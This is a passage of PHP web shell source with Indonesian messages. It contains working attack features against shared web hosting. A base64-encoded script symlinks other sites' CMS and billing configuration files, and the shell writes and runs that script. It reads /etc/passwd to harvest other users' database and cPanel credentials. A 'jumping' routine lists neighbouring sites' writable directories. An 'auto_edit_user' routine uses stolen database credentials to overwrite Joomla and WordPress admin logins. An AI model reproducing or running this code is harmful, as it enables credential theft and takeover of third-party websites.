uJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
562. $file = "idx_config/vhost.cin";
563. $handle = fopen($file ,"w+");
564. fwrite($handle ,base64_decode($vhost));
565. fclose($handle);
566. chmod($file, 0755);
567. if(exe("cd idx_config && ./vhost.cin")) {
568. echo "<center><a href='$link_config/idx_config'><font color=lime>Done</font></a></center>";
569. } else {
570. echo "<center><a href='$link_config/idx_config/vhost.cin'><font color=lime>Done</font></a></center>";
571. }
572.  
573. } else {
574. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
575. while($passwd = fgets($etc)) {
576. if($passwd == "" || !$etc) {
577. echo "<font color=red>Can't read /etc/passwd</font>";
578. } else {
579. preg_match_all('/(.*?):x:/', $passwd, $user_config);
580. foreach($user_config[1] as $user_idx) {
581. $user_config_dir = "/home/$user_idx/public_html/";
582. if(is_readable($user_config_dir)) {
583. $grab_config = array(
584. "/home/$user_idx/.my.cnf" => "cpanel",
585. "/home/$user_idx/.accesshash" => "WHM-accesshash",
586. "$user_config_dir/po-content/config.php" => "Popoji",
587. "$user_config_dir/vdo_config.php" => "Voodoo",
588. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
589. "$user_config_dir/config/koneksi.php" => "Lokomedia",
590. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
591. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
592. "$user_config_dir/whm/configuration.php" => "WHMCS",
593. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
594. "$user_config_dir/forum/config.php" => "phpBB",
595. "$user_config_dir/sites/default/settings.php" => "Drupal",
596. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
597. "$user_config_dir/app/etc/local.xml" => "Magento",
598. "$user_config_dir/joomla/configuration.php" => "Joomla",
599. "$user_config_dir/configuration.php" => "Joomla",
600. "$user_config_dir/wp/wp-config.php" => "WordPress",
601. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
602. "$user_config_dir/wp-config.php" => "WordPress",
603. "$user_config_dir/admin/config.php" => "OpenCart",
604. "$user_config_dir/slconfig.php" => "Sitelok",
605. "$user_config_dir/application/config/database.php" => "Ellislab");
606. foreach($grab_config as $config => $nama_config) {
607. $ambil_config = file_get_contents($config);
608. if($ambil_config == '') {
609. } else {
610. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
611. fputs($file_config,$ambil_config);
612. }
613. }
614. }
615. }
616. }
617. }
618. echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
619. }
620. } elseif($_GET['do'] == 'jumping') {
621. $i = 0;
622. echo "<div class='margin: 5px auto;'>";
623. if(preg_match("/hsphere/", $dir)) {
624. $urls = explode("\r\n", $_POST['url']);
625. if(isset($_POST['jump'])) {
626. echo "<pre>";
627. foreach($urls as $url) {
628. $url = str_replace(array("http://","www."), "", strtolower($url));
629. $etc = "/etc/passwd";
630. $f = fopen($etc,"r");
631. while($gets = fgets($f)) {
632. $pecah = explode(":", $gets);
633. $user = $pecah[0];
634. $dir_user = "/hsphere/local/home/$user";
635. if(is_dir($dir_user) === true) {
636. $url_user = $dir_user."/".$url;
637. if(is_readable($url_user)) {
638. $i++;
639. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
640. if(is_writable($url_user)) {
641. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
642. }
643. echo $jrw."<br>";
644. }
645. }
646. }
647. }
648. if($i == 0) {
649. } else {
650. echo "<br>Total ada ".$i." Kamar di ".$ip;
651. }
652. echo "</pre>";
653. } else {
654. echo '<center>
655. <form method="post">
656. List Domains: <br>
657. <textarea name="url" style="width: 500px; height: 250px;">';
658. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
659. while($getss = fgets($fp)) {
660. echo $getss;
661. }
662. echo '</textarea><br>
663. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
664. </form></center>';
665. }
666. } elseif(preg_match("/vhosts|vhost/", $dir)) {
667. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
668. $urls = explode("\r\n", $_POST['url']);
669. if(isset($_POST['jump'])) {
670. echo "<pre>";
671. foreach($urls as $url) {
672. $url = str_replace("www.", "", $url);
673. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
674. if(is_dir($web_vh) === true) {
675. if(is_readable($web_vh)) {
676. $i++;
677. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
678. if(is_writable($web_vh)) {
679. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
680. }
681. echo $jrw."<br>";
682. }
683. }
684. }
685. if($i == 0) {
686. } else {
687. echo "<br>Total ada ".$i." Kamar di ".$ip;
688. }
689. echo "</pre>";
690. } else {
691. echo '<center>
692. <form method="post">
693. List Domains: <br>
694. <textarea name="url" style="width: 500px; height: 250px;">';
695. bing("ip:$ip");
696. echo '</textarea><br>
697. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
698. </form></center>';
699. }
700. } else {
701. echo "<pre>";
702. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
703. while($passwd = fgets($etc)) {
704. if($passwd == '' || !$etc) {
705. echo "<font color=red>Can't read /etc/passwd</font>";
706. } else {
707. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
708. foreach($user_jumping[1] as $user_idx_jump) {
709. $user_jumping_dir = "/home/$user_idx_jump/public_html";
710. if(is_readable($user_jumping_dir)) {
711. $i++;
712. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
713. if(is_writable($user_jumping_dir)) {
714. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
715. }
716. echo $jrw;
717. if(function_exists('posix_getpwuid')) {
718. $domain_jump = file_get_contents("/etc/named.conf");
719. if($domain_jump == '') {
720. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
721. } else {
722. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
723. foreach($domains_jump[1] as $dj) {
724. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
725. $user_jumping_url = $user_jumping_url['name'];
726. if($user_jumping_url == $user_idx_jump) {
727. echo " => ( <u>$dj</u> )<br>";
728. break;
729. }
730. }
731. }
732. } else {
733. echo "<br>";
734. }
735. }
736. }
737. }
738. }
739. if($i == 0) {
740. } else {
741. echo "<br>Total ada ".$i." Kamar di ".$ip;
742. }
743. echo "</pre>";
744. }
745. echo "</div>";
746. } elseif($_GET['do'] == 'auto_edit_user') {
747. if($_POST['hajar']) {
748. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
749. echo "username atau password harus lebih dari 6 karakter";
750. } else {
751. $user_baru = $_POST['user_baru'];
752. $pass_baru = md5($_POST['pass_baru']);
753. $conf = $_POST['config_dir'];
754. $scan_conf = scandir($conf);
755. foreach($scan_conf as $file_conf) {
756. if(!is_file("$conf/$file_conf")) continue;
757. $config = file_get_contents("$conf/$file_conf");
758. if(preg_match("/JConfig|joomla/",$config)) {
759. $dbhost = ambilkata($config,"host = '","'");
760. $dbuser = ambilkata($config,"user = '","'");
761. $dbpass = ambilkata($config,"password = '","'");
762. $dbname = ambilkata($config,"db = '","'");
763. $dbprefix = ambilkata($config,"dbprefix = '","'");
764. $prefix = $dbprefix."users";
765. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
766. $db = mysql_select_db($dbname);
767. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
768. $result = mysql_fetch_array($q);
769. $id = $result['id'];
770. $site = ambilkata($config,"sitename = '","'");
771. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
772. echo "Config => ".$file_conf."<br>";
773. echo "CMS => Joomla<br>";
774. if($site == '') {
775. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
776. } else {
777. echo "Sitename => $site<br>";
778. }
779. if(!$update OR !$conn OR !$db) {
780. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
781. } else {
782. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
783. }
784. mysql_close($conn);
785. } elseif(preg_match("/WordPress/",$config)) {
